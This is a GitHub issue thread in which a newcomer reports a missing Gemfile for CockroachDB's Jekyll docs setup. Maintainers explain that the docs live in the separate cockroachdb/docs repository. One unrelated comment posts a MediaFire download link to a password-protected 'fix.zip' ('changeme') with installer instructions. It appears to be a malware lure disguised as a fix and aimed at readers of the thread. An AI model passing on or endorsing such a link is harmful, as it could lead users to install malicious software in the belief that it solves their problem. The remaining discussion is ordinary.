### ISSUE TITLE
Missing Gemfile in the repository for Jekyll setup

### ISSUE THREAD

**Issue by Rudraksh2003** [cockroachdb/cockroach#129639]
**Missing Gemfile in the repository for Jekyll setup #129639**

I encountered an issue when trying to run Jekyll using the instructions from the CONTRIBUTOR.md file in the CockroachDB docs repository. The file mentions running bundle install, but no Gemfile is present in the repository, causing the command to fail.

**To Reproduce**

Follow the instructions in the CONTRIBUTOR.md file.
> Clone the CockroachDB docs repository.
> Run the command gem install jekyll bundler.
> Attempt to run bundle install as instructed in the documentation.
> Observe the error stating Could not locate Gemfile or .bundle/ directory.

**Expected behavior**

I expected the repository to include a Gemfile to install the necessary dependencies using bundle install and be able to serve the site locally using Jekyll without issues.

No Gemfile is present in the repository, so it is impossible to run the bundle install command as expected. Running bundle exec jekyll serve also fails due to the missing file.

**Environment:**

 > Ubuntu 24.04 LTS
 > Ruby version: [e.g. 2.x]
 > Jekyll version: 4.3.3

**Additional context**

This issue impacts new contributors trying to set up the CockroachDB docs site locally, as the absence of a Gemfile prevents them from correctly following the instructions.

**Labels**
branch-master

Jira issue: CRDB-41635

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Rudraksh2003** [comment]
Dear @bobvawter,

It appears that the label **X-blathers-untriaged** indicates Blathers was unable to automatically assign an owner to this issue/PR.

Could someone with expertise in Jekyll setups or documentation kindly review this issue? We need assistance in addressing the missing Gemfile in the repository, which is impacting the Jekyll setup.

Thank you in advance for your attention to this matter.

Best regards,
Rudraksh

cc: @BramGruneir, @dt

**Comment by mikeCRL** [comment]
Hi @Rudraksh2003. For **Get Started** > Step 6, if you haven't already, could you please try running `make cockroachdb` from within the `/src/current` directory? That should work; the `Gemfile` and `.bundle` are within that directory. Please let me know if that works for you.

**Comment by Rudraksh2003** [comment]
dear @mikeCRL sir,

Thank you for your suggestion! I tried running the make cockroachdb command from the `/src/current` directory, but it seems that the `/src/current` directory is not present in my local clone of the repository.

Could you kindly provide further clarification on this? I want to ensure that I'm following the correct steps to set up the environment properly.

I appreciate your support and look forward to your response.

Thank you for your assistance!


Best regards,
@Rudraksh2003

**Comment by rickystewart** [comment]
@Rudraksh2003 Did you check out the right repo? You are commenting on an issue in the `cockroachdb/cockroach` repo, suggesting maybe this is the repo you've cloned. The repo Mike is talking about is https://github.com/cockroachdb/docs, which does have a `src/current` directory.

**Comment by Rudraksh2003** [comment]
I apologize for opening an issue in the wrong repository. I am new to open source and still learning the ropes, so I made a mistake. I appreciate your understanding and patience.

Thank you, and I'm sorry for any inconvenience caused.

**Comment by mikeCRL** [comment]
@Rudraksh2003 No problem. Some projects do build docs from their main repo, but it's a separate repo for CockroachDB. I could see how someone might read this repo's CONTRIBUTING.md and not realize that the link about docs points to the other repo. Please let us know if you have any further trouble (you can always create another issue in [cockroachdb/docs](https://github.com/cockroachdb/docs)), or if you need a review or help on a docs PR. You're welcome to mention me on any of those.
